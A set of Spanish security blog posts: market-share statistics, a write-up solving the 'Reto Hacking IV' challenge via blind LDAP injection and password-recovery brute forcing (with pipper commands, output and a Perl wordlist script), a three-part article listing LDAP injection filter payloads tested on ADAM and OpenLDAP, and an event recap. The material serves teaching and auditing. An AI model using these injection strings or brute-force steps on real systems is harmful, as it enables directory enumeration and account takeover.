Con tanto LDAP tengo un poco “tristes” a mis amigos de los flames, así que vamos a comenzar la semana a golpe de polémica. Hay que entrar en calor, que estamos en Octubre…. Y como acaba de terminar septiembre, pues vamos a ver otras estadísticas de estas que tanto nos gustan. Son de Market Share, ya hemos hablado de ellos antes. Tienen monitorizado el tráfico de una muestra de más de 40.000 urls y analizan todos los clientes que pasan por ellos. Esto les ha dejado en el mes de septiembre las siguientes cuotas.

Navegadores. Estadísticas de Septiembre 2007


Las versiones de IE siguen por encima del 77,86 % de cuota de mercado, con una pequeña reducción durante estos nueve meses. Firefox se queda en el 14,88 % de cuota y el resto de los navegadores se reparten el 7 con algo restante.

Sistemas Operativos. Estadísticas de Septiembre 2007


Las versiones de Windows superan el 92 % siendo Windows Vista el segundo sistema operativo más usado y encontrándonos.. ¡¡oh dios mío, otra vez no!!... que Windows 98 está por encima de Linux!!!. Después de que lo habíamos celebrado a bombo y platillo en las anteriores estadísticas…. No pasa nada, no cejaremos en el empeño, que Windows NT (como cliente de navegación) y Windows ME están por detrás [aunque si los sumamos tienen más que Linux…].

En fin, las estadísticas son como los sondeos electorales y mientras que algunos se ilusionan “por lo lento que crece Vista” (tiene ya casi un 8 % de cuota), le ven pasar de lejos a todos los demás siendo el sistema operativo que más crece.

Saludos malignos!

Solucionario Reto Hacking IV por "Mandingo"

Índice
------

- Nivel 1 - Obteniendo e User ID |
- Nivel 2 - Recordatorio de contrasenyas |
- Apendice - Script "words.pl" |
- Referencias |

Nivel 1 - Obteniendo el User ID

Lo primero que llama la atencion despues de analizar las diferentes posibilidades que nos da la pagina "Default.aspx", es el extranyo funcionamiento del script que obtiene los recursos publicos.

Una consulta como esta:

http://retohacking4.elladodelmal.com/Default.aspx?recurso=Impresora&planta=Primera+Planta

Nos devuelve 3 impresoras como resultado.

Hasta ahi bien, pero que pasa cuando probamos algunos caraceres no esperados en la consulta?

recurso=* -> devuelve 6 impresoras. Aparentemente es la suma de los recursos disponibles en esta primera planta mostrados todos con el icono de la impresora

planta=* -> devuelve 6 impresoras, o lo que es igual, la suma de 3+1+2, impresoras por cada planta.

En un principio puede parecer que nos encontramos con un gestor de base de datos con alguna condicion del tipo "like", aunque extranya que el caracter comodin sea "*" en lugar de "%" o "?".

Probamos a introducir comillas simples y dobles en la URL sin obtener resultados de utilidad.

Probamos tambien la herramienta "sqlibf" de "DarkRaver" disponible en "http://open-labs.org/ "para detectar posibles "blind sql injection", sin obtener resultados satisfactorios.

Al parecer, no se trata de un sistema de base de datos "clasico".

Si pensamos en los recursos como dispositivos fisicos, y como organiza Windows los mismos a traves del directorio activo, podemos pensar que nos encontramos antre un sistema que hace consultas del tipo LDAP. Ademas, si revisamos algun documento como el de "spi dynamics" que trata este tema, vemos que se suele utilizar bastante el "*" para realizar inyecciones.

Ejemplos:

variable=*
variable=valor)(|(cn=*)
variable=valor)(%26(cn=*) <- %26 = '&'

Esto equivaldria mas o menos al "1' and '1'='1" usado en otros gestores de bases de datos. Por lo tanto, si agregamos esta cadena a una consulta, deberiamos de obtener los mismos resultados que la original.

http://retohacking4.elladodelmal.com/Default.aspx?recurso=Impresora)(%26(cn=*)&planta=Tercera+Planta

Despues de realizar algunas otras pruebas, parece quedar confirmado que nos encontramos ante una inyeccion LDAP y que la unica informacion util para nosotros es obtener o no impresoras como respuesta, segun la consulta sea verdadera o falsa:

"Blind LDAP Injection?" <- esto es nuevo :)

Usando la herramienta "pipper" y revisando los RFC sobre ldap, vemos que existe un objeto "superior" dentro de toda la jerarquia del directorio llamado "top"; este objeto se obtuvo tambien bruteforceando los recursos con "pipper" aunque en un principio no se sabia que hacer con el.

Usaremos este objeto (top) para navegar en este arbol de recursos que nos proporciona este directorio en busqueda de algo que nos interese. En primer lugar, obtendremos los atributos que se pueden consultar en este objeto:

$ pipper "http://retohacking4.elladodelmal.com/Default.aspx?recurso=top)(|([file]=*))&planta=*)(|(cn=*)" -v file=/home/berto/wordlists/ldap_attr.txt -I -hw 704 -s

==[Options]===================================================
Url : http://retohacking4.elladodelmal.com/Default.aspx?
recurso=top)(|(o=[range]*))&planta=*)(|(cn=*)
Vars : range=a:z-A:Z-0:9
Payloads Path : /home/berto/perl_pruebas/pipper
Hide Words : 704
Download Page : yes
Sort Results : yes
Threads : 20 - Payload : range - Aprox Requests : 63
Response Codes : 200 OK 204 Empty 301 Mved 401 Unauth. 404 NotFound 500
SrvError
==[Begin 11:55]===================================================
#00001 200 189 705 Default.aspx?recurso=top)(|(o=*))&planta=*)(|(cn=*)
#00019 200 189= 705 Default.aspx?recurso=top)(|(o=r*))&planta=*)(|(cn=*)
#00045 200 189= 705 Default.aspx?recurso=top)(|(o=R*))&planta=*)(|(cn=*)
==[End]===================================================

El diccionario "ldap_attr.txt", el cual contiene los atributos disponibles para cada objeto LDAP, ha sido generado a partir del siguiente documento:

http://docs.sun.com/source/816-6699-10/objclass.html

Este ataque por fuerza bruta muestra que atributos de "top" podemos consultar:

cn : commmon name (nombre del objeto consultado)
member : nombre del miembro de grupo
o : organizacion a la cual pertenece el grupo
ou : unidad organizativa a la que pertenece el grupo

Una vez conocido el nombre de estos atributos, vamos a usar "pipper" de nuevo para bruteforcear caracter a caracter los posibles valores de estos atributos:

$ pipper "http://retohacking4.elladodelmal.com/Default.aspx?recurso=top) \
(|(o=[range]*))&planta=*" -v range=a:z-A:Z-0:9 -I -hw 704 -s
==[Options]===================================================
Url : http://retohacking4.elladodelmal.com/Default.aspx?
recurso=top)(|(o=[range]*))&planta=*)(|(cn=*)
Vars : range=a:z-A:Z-0:9
Payloads Path : /home/berto/perl_pruebas/pipper
Hide Words : 704
Download Page : yes
Sort Results : yes
Threads : 20 - Payload : range - Aprox Requests : 63
Response Codes : 200 OK 204 Empty 301 Mved 401 Unauth. 404 NotFound 500
SrvError
==[Begin 11:55]===================================================
#00001 200 189 705 Default.aspx?recurso=top)(|(o=*))&planta=*)(|(cn=*)
#00019 200 189= 705 Default.aspx?recurso=top)(|(o=r*))&planta=*)(|(cn=*)
#00045 200 189= 705 Default.aspx?recurso=top)(|(o=R*))&planta=*)(|(cn=*)
==[End]===================================================

De este resultado podemos concluir que existe una "organizacion" dentro del arbol LDAP que comienza por "r" o "R".

Nota: se pudo comprobar que es indiferente en este caso usar mayusculas o minusculas. En el caso de que la letra este en mayusculas se devuelve tambien como verdadero el valor en minusculas.

Una vez conocida este primer caracter, pasemos a obtener los siguientes usando el mismo metodo fijando esta vez la "r" (o=R*[range]).

Al cabo de un rato tenemos ya el valor de esta organizacion: "Retohacking4"

Una vez en este punto, queremos seguir "bajando" dentro del arbol LDAP del directorio, por lo que vamos a comprobar que otros atributos se pueden consultar dentro de esta "organizacion".

Usando el mismo metodo de antes podemos obtener el nombre de un usuario:

http://retohacking4.elladodelmal.com/Default.aspx?recurso=top)
(|(o=Retohacking4)(%26(cn=arvin%20sloane))))&planta=*

Y a partir de aqui, y siguiente el mismo metodo, su "uid" o "identificador de usuario" :)

Vamos a la pagina de recordatorio de contrasemyas, introducimos este "uid" y listo, obtenemos la frase que nos lleva al segundo nivel.

Nivel 2 - Recordatorio de contrasenyas

Una vez obtenida la cuenta de usuario mediante la inyeccion LDAP, nos dirigimos al recordatorio de contraseñas.

En este punto se nos plantea la siguiente pregunta:

"Donde se cerro el Circulo?"

La verdad es que la pregunta es bastante ambigua, y para aquellos que no hayan visto la serie, entre los que yo me incluyo, no da realmente pistas, por lo que puede parecer una pregunta con truco o algo que investigar.

Despues de probar cosas al azar, y teniendo en cuenta que toda esta historia tiene que tener algun sentido, llega el momento de recapacitar un poco y analizar "qué sabemos" y "qué tenemos".

** "Qué sabemos?" **

- sabemos el episodio donde se hace referencia por primera vez a la red "Profeta 5", 1er capitulo de la primera temporada. Es muy probable que se haga referencia a este "Circulo" durante esta temporada.

- sabemos que es un hecho pasado pero no somos capaces de determinar cuando fue. Volvemos a pensar en esta ultima temporada para averiguar la solucion.

- "Circulo", con la "C" en mayusculas. Parece hacer referencia a un grupo de confianza, organizacion, o algo similar.

** "Que tenemos?" **

- google

- wikipedia, tanto en ingles como en castellano para consultar tanto episodios como personajes de la serie.

- subtitulos de todas las temporadas para descargar

- herramientas para generar diccionarios y lanzar ataques de fuerza bruta

Manos a la obra:

Buscamos en google las palabras circulo, temporada 5, alias, etc.. diferentes combinaciones sin exito. Este metodo parece ir para largo, sobre todo cuando se desconoce la serie, asi que lo dejamos aparcado de momento y pasamos a otra cosa.

Tras probar el nombre de diferentes lugares, ubicaciones, y hasta personajes al azar sin exito, se procede a crear un diccionario con todas las palabras que aparecen en la temporada 5 de la wikipedia:

words.pl http://en.wikipedia.org/wiki/Alias_episodes_%28season_5%29 \
> /tmp/words.txt

Con estas palabras lanzaremos un ataque de fuerza bruta contra el formulario de recuperacion de contrasenya para intentar obtener la respuesta. Para ello utilizaremos la herramienta "pipper", la cual esta disponible en la siguiente direccion:

http://www.yoire.com/downloads.php?tag=pipper

Lanzaremos el ataque de la siguiente forma:

pipper \
"http://retohacking4.elladodelmal.com/Default.aspx?uid=[U]&respuesta=[file]"\
-v file=/tmp/words.txt -I -hw

Donde [U] deberemos reemplazarlo por el usuario obtenido a traves de la inyeccion LDAP, y indica el numero de palabras de las respuestas que queremos ocultar; se recomienda leer el manual de pipper para entender mejor esta parte.

Despues de lanzar el ataque vemos que no se obtienen resultados satisfactorios, por lo tanto, puede estar pasando una de estas 4 cosas:

- La respuesta no se encuentra en la wikipedia.

- La respuesta es una palabra compuesta; el script "words.pl" no es capaz de identificar palabras compuestas.

- El formulario es sensible a mayusculas mininusculas.

- Varias de estas hipotesis pueden ser validas.

A continuacion se va a lanzar un ataque similar, pero esta vez, basandonos en los subtitulos de esta temporada. Con el script "words.pl" vamos a generar un nuevo diccionario y procederemos igual que antes.

Este ultimo ataque tampoco parece funcionar, ninguna palabra parece ser la respuesta válida.

Aqui es cuando ya te planteas ver la serie o tirar la toalla. Ver la serie teniendo en cuenta que es cuestion de tiempo que otro se lo pase antes, esta bien si la tienes en casa o te la pueden pasar... en cualquier otro caso, o tienes suerte o "vas dao" :)

Como no estamos dispuestos a tirar la toalla ahora que estamos tan cerca, volvemos de nuevo sobre lo que ya teniamos y habiamos dejamos aparcado...

Tras varias búsquedas infructuosas damos con lo siguiente:

-> buscar: alias season 5 circle

Entre otras paginas se nos muestra la siguiente:

http://www.neloo.com/alias/about7.html

Dentro de esta pagina podemos leer el siguiente parrafo:

"the circle will be complete when the Chosen One finds The Rose in San Chielo."

Una vez que introducimos el texto "San Chielo" en la respuesta del recordatorio de contrasenya junto con el usuario LDAP encontrado, obtenemos la contraseña del usuario superando asi el reto ;)

Apendice - script "words.pl"

#!/usr/bin/perl

use WWW::Curl::Easy;
use strict;

my $file=$ARGV[0];
my ($header,$body);

if($#ARGV eq -1){
print "Usage: $0 \n";
exit;
}
if($file=~/^http/){
my $curl = new WWW::Curl::Easy;
$curl->setopt(CURLOPT_SSL_VERIFYPEER,0);
$curl->setopt(CURLOPT_SSL_VERIFYHOST,1);
$curl->setopt(CURLOPT_URL,$file);
$curl->setopt(CURLOPT_HEADERFUNCTION, \&header_callback );
$curl->setopt(CURLOPT_WRITEFUNCTION, \&body_callback );
push my @headers,"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98";
$curl->setopt(CURLOPT_HTTPHEADER,\@headers);

$curl->perform();
}
$body=`cat $file` if (-e $file);

$body=~s/[script.*?[\/script]/ /gsm;
$body=~s// /gsm;
$body=~s/<[^>]*>?/ /gsm;
$body=~s/ / /gsm;
$body=~s/&(.)acute;/$1/gsm;
$body=~s/ñ/n/gsm;
$body=~tr/àáèéìíòóùúñ/aaeeiioouun/;
$body=~s/&[^;]*;?/ /gsm;
$body=~s/\W/ /gsm;
$body=~s/\s+/SPACE/gsm;
$body=~s/(SPACE)+/ /gsm;

my @words=split(" ",lc($body));
my @uniq=sort(keys %{{ map { $_ => 1 } @words }});

@uniq=grep(/\w{3,}/,@uniq);
print join("\n",@uniq),"\n";

sub header_callback {
my $chunk = shift;
$header.=$chunk;
return length($chunk);
}

sub body_callback {
my ( $chunk, $handle ) = @_;
$body.=$chunk;
return length($chunk);
}

Referencias

* Reto Hacking 4: http://retohacking4.elladodelmal.com/

* Pipper v1.23: http://www.yoire.com/downloads.php?tag=pipper

* Sqlibf: http://open-labs.org/

* Referencia de objetos LDAP: http://docs.sun.com/source/816-6699-10/objclass.html

* RFC2307 - An approach for using LDAP as a Network Information...:
http://www.faqs.org/rfcs/rfc2307.html

LDAP Injection & Blind LDAP Injection

Aprovechando que he madrugado he terminado de postear el artículo que he publicado en Windows TI Magazine este mes de Octubre sobre LDAP Injection & Blind LDAP Injection. La primera parte del mismo está dedicada a LDAP Injection, la segunda parte a Blind LDAP Injection y la tercera a las pruebas de las inyecciones propuestas por Sacha Faust sobre un árbol ADAM y otro árbol OpenLDAP. El índice es el siguiente:

Índice:
-------
LDAP Injection & Blind LDAP Injection (Parte I de III)
LDAP Injection & Blind LDAP Injection (Parte II de III)
LDAP Injection & Blind LDAP Injection (Parte III de III)

Autores: Chema Alonso, Rodolfo Bordón, Antonio Guzmán, Marta Beltran.

Agradecimientos: A RoMaNSoFt por enseñarme a reducir el charset; Mandigo, Dani Kachail y Pedro Laguna por enviarme el solucionario del RetoHacking 4 (que haré y harán públicos) y permitirme aprender de ellos; y a Carles del Collado de Windows Ti Magazine por dejarme publicar el artículo fuera de tiempo. ¡Gracias!

LDAP Injection & Blind LDAP Injection (Parte III de III)

********************************************************
Índice:
LDAP Injection & Blind LDAP Injection (Parte I de III)
LDAP Injection & Blind LDAP Injection (Parte II de III)
LDAP Injection & Blind LDAP Injection (Parte III de III)
********************************************************

En este parte del artículo simplemente se han probado las inyecciones descritas por Sacha Faust en su documento "LDAP Injection" sobre entornos ADAM y OpenLDAP.

LDAP Injection con ADAM de Microsoft

Para realizar todas las pruebas de las cadenas a inyectar hemos utilizado la herramienta LDAP Browser que permite conectarse a distintos árboles LDAP y una cliente web creado con el componente IPWorksASP.LDAP de la empresa /n Software, para realizar las pruebas de ejecución de filtros. En la imagen 1 se muestra la estructura que hemos creado de ejemplo en ADAM.

Imagen: Estructura del árbol LDAP creado en ADAM
Supongamos ahora que la aplicación web utiliza una consulta con el siguiente filtro: (cn=Impresora_1). Al lanzar esta consulta se obtiene 1 objeto, como se puede ver en la imagen siguiente:

Imagen: Se obtiene un objeto de respuesta con el filtro (cn=Impresora_1)
Lo deseable por un atacante que realice una inyección sería poder acceder a toda la información mediante la inclusión una consulta que nos devolviera todas las impresoras, en un supuesto ataque. En el ejemplo, vemos cual debería ser el resultado a obtener con una consulta siguiendo la RFC 4515 sobre ADAM: (|(cn=Impresora_1)(cn=Impresora*))

Imagen: Todas las impresoras
Sin embargo, como se puede apreciar, para construir ese filtro, necesitaríamos inyectar un operador y un paréntesis al principio. En el ejemplo, la inyección no “parece” ser muy útil pues se está realizando en ambas condicionantes sobre cn, pero ese filtro sólo está creado para ilustrar la necesidad de inyectar código antes del filtro y en el medio del filtro. Si probamos la inyección propuesta por Sacha Faust en ADAM: (cn=Impresora_1)(|(cn=Impresora*))

Imagen: Inyección sin resultados
Como se puede apreciar en la captura, en la última prueba, la inyección no produce ningún error, pero a diferencia de las pruebas que realiza Sacha Faust con SunOne Directory Server 5.0, el servidor ADAM no devuelve más datos. Es decir, sólo devuelve los datos del primer filtro completo y el resto de la cadena es ignorado.

LDAP Injection con OpenLDAP

Para realizar las pruebas de inyección en OpenLDAP hemos utilizado el árbol que ofrece de pruebas el propio proyecto OpenLPAD.org cuya estructura es la siguiente:

Imagen: Estructura del árbol LDAP en OpenLDAP
Sobre esta estructura ejecutamos una consulta para buscar a un usuario obteniendo un único objeto como resultado: (uid=kurt)

Imagen: Al ejecutar el filtro (uid=kurt) obtenemos un único resultado
Si quisiéramos ampliar el número de resultados, siguiendo la RFC 4515 deberíamos ejecutar una consulta en la que inyectáramos un operador OR y un filtro que incluyera a todos los resultados, como se puede ver en la siguiente imagen: (|(uid=kurt)(uid=*))

Imagen: Todos los usuarios
Si realizamos la inyección tal y como propone Sacha Faust en su documento sobre LDAP obtendríamos los siguientes resultados: (uid=kurt)(|(uid=*))

Imagen: Inyección OpenLDAP. Se ignora el segundo filtro.
Como puede apreciarse en la captura, el servidor OpenLDAP ha ignorado el segundo filtro y solo ha devuelto un usuario, de igual forma que realizaba ADAM.

********************************************************
Índice:
LDAP Injection & Blind LDAP Injection (Parte I de III)
LDAP Injection & Blind LDAP Injection (Parte II de III)
LDAP Injection & Blind LDAP Injection (Parte III de III)
********************************************************

LDAP Injection & Blind LDAP Injection (Parte II de III)

********************************************************
Índice:
LDAP Injection & Blind LDAP Injection (Parte I de III)
LDAP Injection & Blind LDAP Injection (Parte II de III)
LDAP Injection & Blind LDAP Injection (Parte III de III)
********************************************************

Blind LDAP Injection

Una de las evoluciones de las inyecciones de comandos son las acciones a ciegas; los ataques “Blind”. Es común encontrarse ya documentados los ataques Blind SQL Injection, pero de los ataques Blind LDAP Injection sin embargo no se ha hablado nada aún. ¿Es posible realizar un ataque a ciegas para extraer información de un árbol LDAP? La respuesta, obviamente, es Sí.

El entorno para realizar un ataque a ciegas suele ser una aplicación web que cumple dos características:

- La aplicación no muestra los resultados obtenidos de la consulta realiza al árbol LDAP.

- El uso de los resultados produce cambios en la respuesta http que el cliente recibe.

Para realizar un ataque a ciegas necesitamos poder crear la lógica para extraer información cambiando los resultados obtenidos con el filtro LDAP y observando los cambios en las respuestas http.

Blind LDAP Injection en un entorno “AND”

En esta situación tenemos una consulta generada en el lado del servidor del siguiente tipo:

(&(atributo1=valor1)(atributo2=valor2))

Para realizar la inyección deberemos tener en cuenta que en un entrono AND tenemos un parámetro fijo que nos va a mediatizar. El entorno ideal es que el atributo1 sea lo más general posible, por ejemplo objectClass, o cn, con lo que podremos seleccionar casi cualquier objeto del árbol. Después deberemos aplicarle un valor que sea True, es decir, que siempre seleccione objetos para tenerlo fijado a valor true y utilizar como segundo atributo uno conocido que también nos garantice que sea True.

Supongamos la siguiente consulta LDAP:

(&(objectClass=Impresoras)(impresoraTipo=Epson*))
que se lanza para saber si en el almacén de una empresa hay impresoras Epson de tal manera que el programador, si recibe algún objeto, simplemente pinta en la página web un icono de una impresora Epson.

Está claro que lo más que conseguiremos tras la inyección es ver o no el icono de la impresora. Bien, pues a ello. Fijemos la respuesta positiva tal y como hemos dicho, realizando una inyección del siguiente tipo:

(&(objectClass=*)(objectClass=*))(&(objectClass=void)(impresoraTipo=Epson*))

Lo que está puesto en negrita sería la inyección que introduciría el atacante. Esta inyección debe devolver siempre algún objeto luego, en el ejemplo planteado, en la respuesta http veríamos un icono de la impresora. A partir de ahí podríamos extraer los tipos de objectClass que tenemos en nuestro árbol LDAP.

Reconocimiento de clases de objetos de un árbol LDAP

Sabiendo que el filtro (objectClass=*) siempre devuelve algún objeto deberíamos centrarnos en el segundo filtro realizando un recorrido de la siguiente forma:

(&(objectClass=*)(objectClass=users))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=*)(objectClass=personas))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=*)(objectClass=usuarios))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=*)(objectClass=logins))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=*)(objectClass=…))(&(objectClass=foo)(impresoraTipo=Epson*))

De tal forma que todas aquellas inyecciones que devolvieran el icono de la impresora en la página web serían respuestas afirmativas que nos indicarían la existencia de ese tipo de objetos.

Otra forma más eficiente sería realizando un barrido en el espectro del alfabeto de posibles valores utilizando una búsqueda con comodines, para ello realizaríamos un árbol que comenzaría por todas las letras del abecedario, de la siguiente forma:

(&(objectClass=*)(objectClass=a*))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=*)(objectClass=b*))(&(objectClass=foo)(impresoraTipo=Epson*))
…
(&(objectClass=*)(objectClass=z*))(&(objectClass=foo)(impresoraTipo=Epson*))

De tal manera que seguiríamos desplegando el árbol de aquellas que hubieran dado una respuesta positiva.

(&(objectClass=*)(objectClass=aa*))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=*)(objectClass=ab*))(&(objectClass=foo)(impresoraTipo=Epson*))
…
(&(objectClass=*)(objectClass=az*))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=*)(objectClass=ba*))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=*)(objectClass=bb*))(&(objectClass=foo)(impresoraTipo=Epson*))
…

Y así sucesivamente con lo que, desplegando siempre las positivas podríamos llegar a saber el nombre de todos los objetcClass de un sistema.

Imagen: Árbol de despliegue.Se profundizará en todas las respuestas positivas (color verde)
Este mecanismo no solo funciona para objectClass sino que sería válido para cualquier atributo que un objeto compartiera con el atributo fijo. Una vez sacados los objectClass, podríamos proceder a realizar el mismo recorrido para extraer la información de ellos, por ejemplo, si queremos extraer los nombres de todos los usuarios de un sistema, bastaría con realizar el barrido con la siguiente inyección:

(&(objectClass=user)(uid=a*))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=user)(uid=b*))(&(objectClass=foo)(impresoraTipo=Epson*))
…
(&(objectClass=user)(uid=z*))(&(objectClass=foo)(impresoraTipo=Epson*))

Este método obliga a hacer un recorrido en amplitud por un árbol cuya posibilidad de expandirse en cada nodo siempre es igual al alfabeto completo. Se puede reducir este alfabeto realizando un recorrido para averiguar que caracteres no están siendo utilizados en ninguna posición en ningún objeto utilizando un recorrido de la siguiente forma:

(&(objectClass=user)(uid=*a*))(&(objectClass=foo)(impresoraTipo=Epson*))
(&(objectClass=user)(uid=*b*))(&(objectClass=foo)(impresoraTipo=Epson*))
…
(&(objectClass=user)(uid=*z*))(&(objectClass=foo)(impresoraTipo=Epson*))

De esta forma se puede excluir del alfabeto a aquellos caracteres que no hayan devuelto un resultado positivo tras este primer recorrido. Si desearamos buscar un único valor, podríamos realizar una búsqueda binaria de cada uno de los caracteres utilizando los operadores realionales <= o >= para reducir el número de peticiones.

Blind LDAP Injection en un entorno “OR”

En esta situación tenemos una consulta generada en el lado del servidor del siguiente tipo:

(|(atributo1=valor1)(atributo2=valor2))
En este entorno la lógica que debemos utilizar es al contrario. En lugar de fijar el valor del primer filtro a un valor siempre cierto deberemos fijarlo a un valor siempre falso y a partir de ahí, extraer la información, es decir, realizaríamos una inyección de la siguiente forma:

(|(objectClass=void)(objectClass=void))(&(objectClass=void)(impresoraTipo=Epson*))

Con esta inyección obtendremos el valor negativo de referencia. En el ejemplo planteado de las impresoras disponibles deberemos obtener un resultado sin el icono de la impresora. Luego podremos inferir la información cuando sea verdadero el segundo filtro.

(|(objectClass=void)(objectClass=users))(&(objectClass=void)(impresoraTipo=Epson*))
(|(objectClass=void)(objectClass=personas))(&(objectClass=void)(impresoraTipo=Epson*))
(|(objectClass=void)(objectClass=usuarios))(&(objectClass=void)(impresoraTipo=Epson*))
(|(objectClass=void)(objectClass=logins))(&(objectClass=void)(impresoraTipo=Epson*))
(|(objectClass=void)(objectClass=…))(&(objectClass=void)(impresoraTipo=Epson*))

De igual forma que en el ejemplo con el operador AND podríamos extraer toda la información del árbol LDAP utilizando los comodines.

Conclusiones

LDAP es una tecnología en expansión cuya implantación en los sistemas de directorio y meta directorio la hacen cada día más popular. Los entornos Intranet realizan uso intensivo de esta tecnología para ofrecer sistemas de Single Sing-On e incluso es común encontrar entornos LDAP en los servicios de Internet.

Esta popularidad hace que sea necesario incluir las pruebas anteriores dentro de los procesos de auditoría de seguridad de las aplicaciones web. Las pruebas de inyecciones de auditoría que se estaban realizando hoy en día, siguiendo la documentación existente, son de poca ayuda pues en los entornos más comunes como ADAM u OpenLDAP no funcionan.

La solución para proteger las aplicaciones frente a este tipo de inyecciones es, como en otros entornos de explotación, filtrar los parámetros enviados desde el cliente. En este caso filtrar operadores, paréntesis y comodines para que nunca un atacante sea capaz de inyectar lógica dentro de nuestra aplicación.

********************************************************
Índice:
LDAP Injection & Blind LDAP Injection (Parte I de III)
LDAP Injection & Blind LDAP Injection (Parte II de III)
LDAP Injection & Blind LDAP Injection (Parte III de III)
********************************************************

Post-Mortem

Acabó el evento y he de decir que ha pasado a ser uno de los eventos que personalmente, más me han gustado de los que he participado. Espero que los 190 tipos que allí nos juntamos lo pasaran igual de bien que yo. Los videos no se como se han grabado ni como será la calidad del video o del audio porque los grabamos en plan amateur, pero intentaré ponerlos. Tuvimos un incidente con el LP y cuando iba a empezar la sesión de Tarasco tuve que decidir si se grababa la sesión de Andrés o la mia y del abuelo, así que se grabó la sesión de Tarasco y la del abuelo y mia se corta casi al empezar. No dio para más el Cd, pero al abuleo y a mi nos habéis visto y nos veréis con más facilidad que al señor Tarasco.

Todo comenzó con la cena a la que vinieron Dani Kachakil, Pedro Laguna, Olgita y Brero desde sevilla, RoMaNSoFt e Isabel, Aramosf, Mabel, Javi, Rodol, Tarasco, Knovas, Gura, Alex, Paco Zulueta desde Valencia, el chico maravillas, el abuelo, Miguel desde Alicante, Mandingo y el menda (creo que no me dejo a nadie).

Foto de un lado de la mesa: Dani, Mandingo, Roman(de espaldas), Isabel, Mabel, aramosf, Javi, Andrés Tarasco...
La charla la comenzaron Pedro Laguna y Dani Kachakil hablando de SQL Injection y Blind SQL Injection y se curraron las demos sobre Blind SQL Injection en Base a tiempos con consultas pesadas [traducción] en que hemos estado trabajando y las contramedidas. Dani dijo que era la primera vez que lo hacía, pero joder, yo creo que nos engaña, porque lo hace de puta madre. Pedro ya sé que lo hace muy bien porque le he visto varias veces, aunque "alguien" por la note le hizo un DOS con absenta la noche antes y nos lo trajo un poco resacoso. ;)

Dani Kachakil (con el micro) & Pedro Laguna
Después vino Roman. La primera vez que hablaba en público. Entre Isabel y yo conseguimos que se subiera al escenario y nos diera un sesión sobre como se enfrenta él ante una auditoría de una aplicación web. En este caso eligió el Reto Hacking III para contarnos que pistas, razonamientos, tecnologías y herramientas uso para pasarlo. Nos publicó el solucionario del reto III hace tiempo explicándolo, pero verlo en directo y de su voz estuvo perfecto.

RoMaNSoFt, otra vez de espaldas...
Mandingo nos sorpendió con una charla en la que nos mostó otro lado de realizar una auditoría, como debe enfrentarse alguien ante el reto de encontrar los fallos en las aplicaciones web. Personas que hacen tecnología que van a ser atacada por personas. Como llegar a la persona detrás de la tecnología, el entorno es muy heterogéneo, hay que adaptarse... Una charla para reflexionar. Moló. También nos mostró algunos ejemplos de Pipper [a partir de ahora paiper gracias al bautismo de Roman], la herramienta que usa él para "plasmar sus ideás". ;) Yo que tuve la suerte de pasar bastanes horas con él he sido el que más he aprendido en estos dos días seguro.

Mandingo puro!
Las diapositivas de la sesión de estos dos piezas las ha colgado RoMaNSoFt en su web.

Luego vino es señor Andrés Tarasco, elegantemente enfundado en traje (erés un crá!) a contarnos "a que dedica el tiempo" y como utilizar la herramienta Fscan para detectar vulnerabilidades en servidores web, dispositivos de conexión, etc... Estuvo muy tranquilo y explicandolo todo muy, muy bien. Nos contó como personalizar los scaneos con FScan, auqnue aún no nos ha permitido descargar la última versión de la tool. De momento la herramienta está descargable en la web de 514. ¡Gracias por venir Andrés!

Andrés Tarasco singing
Luego nos tocó al abuelo y a mi, pero procuramos no hacernos muy pesados, así que intentamos ir ligeritos. Nuestra sesión habló sobre LDAP, y contamos cosas como los el tema de ayer de la captura de credenciales LDAP y sobre LDAP Injection. Para que podais acceder a lo que contamos os voy a publicar en tres post un gran extracto del artículo que he publicado sobre este tema en la Windows TI Magazine de este mes y que tendréis disponible en su web en breve. Aquí os dejo el primero:

- LDAP Injection & Blind LDAP Injection (Parte I de III)

Y poco más, gracias otra vez a los que me trajísteis un regalo, y espero seguir viendoos.

Saludos Malignos!

LDAP Injection & Blind LDAP Injection (Parte I de III)

********************************************************
Índice:
LDAP Injection & Blind LDAP Injection (Parte I de III)
LDAP Injection & Blind LDAP Injection (Parte II de III)
LDAP Injection & Blind LDAP Injection (Parte III de III)
********************************************************

Las técnicas de inyección de código se han utilizado para saltarse las restricciones de seguridad de las aplicaciones y sistemas, y, para logar este objetivo, se han especializado para afectar las distintas tecnologías. Una de las "últimas" en estudiarse han sido las técnicas de Inyección LDAP. De éstas la primera referencia que encontramos es la que nos ofrece Sacha Faust, de la empresa SPI Dynamics en su documento “LDAP Injection". El resto de artículos que se han publicado hacen siempre referencia a este mismo documento, convirtiéndolo casi en la única fuente documentada y pública de este tipo de técnicas. La mayoría de las publicaciones que hay sobre este tema referencian una y otra vez los mismos ejemplos publicados por Sacha Faust y las que no lo hacen aportan poco en el estudio de este problema.

LDAP

LDAP (lLightweight Directory Access Protocol) es un protocolo de acceso “ligero” a un directorio de servicios sobre TCP/IP. Inicialmente nació como una forma de consultar las bases de datos jerarquizadas de información en los árboles X.500 pero con el tiempo cobró entidad propia y hoy en día el directorio de información es un árbol LDAP. Con sus propias estructuras y documentos que formalizan esta tecnología. La versión actual está documentada por la RCF 4511, de Junio de 2006. El protocolo de acceso LDAP se utiliza para consultar y modificar los objetos almacenados.

Filtros LDAP

Es importante comprender el funcionamiento de los filtros LDAP, para ello, podemos consultar la RFC 4515 de Junio de 2006. En ella se adjunta la definición completa del leguaje de filtros, pero podemos resumirlo en la siguiente estructura:

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = “=” /”~=”/ “>=” / “<=”
Present = attr = *
Substring = attr “=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue

